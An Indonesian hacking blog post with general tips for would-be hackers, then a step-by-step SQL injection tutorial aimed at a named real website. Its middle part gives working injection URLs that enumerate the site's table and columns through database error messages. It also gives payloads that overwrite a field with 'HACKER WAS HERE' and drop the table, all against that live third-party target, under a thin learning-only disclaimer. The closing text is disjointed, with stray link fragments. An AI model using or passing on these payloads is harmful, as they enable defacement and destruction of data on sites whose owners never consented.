Sukai dan cintai dulu komputer, masuk
keseluk-beluknya kemudian terus berlatih, perbanyak teman dan memecahkah
masalah bersama-sama.
Belajar tidak bergantung kepada yang
hanya disekolah saja, belajarlah dari dunia diluar sekolah dan ulangi
hal-hal yang sama untuk mempermudah dan menjadi kebiasaan.
Ada beberapa tips yang perlu bahkan sangat perlu untuk dipertimbangkan jika Anda ingin menjadi Hacker Sejati diantaranya :
Dedikasi:
Dedikasi adalah kunci utama untuk menjadi seorang hacker. Jangan
berencana untuk menjadi hacker karena uang. Jika Anda benar-benar
memiliki minat, lakukan demi aktualisasi dan dedikasi Anda pada dunia
hacker.
Reading:
Jadilah seorang kutu buku. Cobalah untuk membaca buku-buku yang
berkaitan dengan komputer dan arsitekturnya. Beli buku yang terkait
dengan sistem Keamanan dan hacking.
Tahu bagaimana hacker bekerja:
Anda tidak dapat memecahkan masalah sampai Anda tahu apa yang ada di
balik masalah. Jadi, Anda harus mempelajari metode atau cara kerja para
hacker top dunia.
Pemrograman dan Scripting:
Pelajari Beberapa bahasa pemrograman atau scripting karena sebagian
besar waktu Anda akan tersedot untuk menulis kode agar dapat menjebol
sistem. Anda harus juga tahu coding untuk memahami bagaimana sistem
bekerja. Saran saya gunakan bahasa pemrograman C. Bahasa pemrograman ini
adalah salah satu yang terbaik di dunia. Beberapa Hacker memang ada
yang lebih memilih python. tetapi bagi saya, lebih menyukai menggunakan
C.
Linux: Ok, sekarang saatnya untuk beralih dari Windows ke Linux. Belajarlah untuk bekerja dengan Linux.
Pelajari BackTrack Linux:
Backtrack Linux adalah salah satu yang terkenal untuk Penetrasi
Pengujian distribusi Linux. Backtrack ini memiliki hampir semua alat
pengujian penetrasi yang diperlukan untuk profesional keamanan.
Bergabunglah pada forum-forum Hacker:
Berpartisipasi dalam forum terkait Hacking adalah sangat signifikan
pengaruhnya bagi perkembangan informasi tentang dunia Hacking. Disana
banyak pengetahuan yang sulit didapatkan dan tidak pernah ditulis pada
buku manapun
Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula
Belajar Teknik Hacking SQL Injection [Pada URL] Untuk Pemula
Pada
kesempatan kali ini, saya akan mencoba menerangkan tentang serangan ke
suatu website menggunakan teknik SQL Injection. Saya akan menunjukkan
SQL Injection melalui URL. Pada dasarnya caranya adalah sama karena
keduanya sama- sama merupakan parameter input.
Teknik untuk
menemukan nama field dan table ditemukan oleh david Litcfield. Teknik
yang digunakan disini adalah dengan membuat terjadinya error menggunakan
perintah having 1=1
STEP 1
Oke, kita langsung masuk ke contoh nyata. Web target kita kali ini ialah :
Untuk mendapatkan nama table dan nama field pertama, ialah dengan cara memasukkan perintah dibawah ini pada browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.id' is invalid in the select list because it is not contained in
either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama table = media
nama field pertama = id
STEP 2
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.mediadate' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field kedua = mediadate
STEP 3
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.mediatitle' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field ketiga = mediatitle
STEP 4
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.mediapublisher' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keempat= mediapublisher
STEP 5
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57
GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher
having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.mediapath' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field kelima= mediapath
STEP 6
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57
GROUP BY
media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath
having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column
'media.ishtml' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keenam= ishtml
STEP 7
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57
GROUP BY
media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath,media.ishtml
having 1=1
Dengan perintah tersebut, maka kita tidak akan mendapatkan pesan error apapun. Artinya, bahwa pencarian field sudah selesai.
HACKING STEP....
MERUBAH DATA
Untuk
merubah data, gunakanlah command SQL yaitu UPDATE. Contohnya kita akan
merubah isi dari field ”mediapublisher”, perintah lengkapnya ialah :
http://www.24x7learning.com/Press_Releases/news.asp?id=57; UPDATE media set mediapublisher=’HACKER WAS HERE’ where id=57;
MENGHAPUS TABLE
Tindakan
yang paling “extreme” ialah menghapus/ drop table. Untuk melakukannya
Anda bisa menggunakan comman SQL, yaitu DROP. Perintah lengkapnya ialah :
http://www.24x7learning.com/Press_Releases/news.asp?id=57; drop table
media;
End….
Artikel
ini hanya untuk tujuan pembelajaran semata. Tidak pernah dibenarkan
untuk melakukan kegiatan cracking kepada suatu website. Satu hal yang
perlu Anda ketahui ialah dengan melakukan deface terhadap 100 website
tidak akan menjadikan Anda seorang Hacker.
2. The Mole
Sebelum belajar menjadi seorang hacker adalah memahami kinerja softwear terutama adalah bidang internet URL click disini URL tahap selanjutnya adalah Syntak dan banyak sekali klick disini hacker jombang kids
Masih berkaitan erat dengan postingan saya sebelum-sebelumnya, tentang Artikel : “Apa itu Hacker?”, “5 Cewek
Cantik Hacker & Hacker Terkenal di Dunia” , “Fakta Menarik Tentang
Hacker” , “Langkah Apa Saja Yang Dilakukan Para Hacker Ketika Membobol
Bank.” Hacker atau Peretas biasanya
identik dengan dunia kejahatan jika memang tidak dimanfaatkan dengan
baik. Mereka lebih banyak diam dengan menyembunyikan identitasnya, tapi
dibalik itu mereka adalah Seorang Profesional yang tak ingin diketahui
oleh orang lain. Di mana Hacker
adalah mereka yang mempunyai kemampuan menganalisa kelemahan suatu
sistem atau situs, mereka punya etika serta kreatif dalam merancang
suatu program yang berguna bagi siapa saja. Sedangkan Cracker
adalah mereka yang mampu membuat suatu program bagi kepentingan dirinya
sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu
keuntungan bagi dirinya atau kelompoknya. Hacker sejati bukanlah tipe
orang yang mudah menyerah kalah. Mereka memiliki daya juang yang tinggi,
dan jarang diantaranya yang bertipe suka pamer kemampuan.
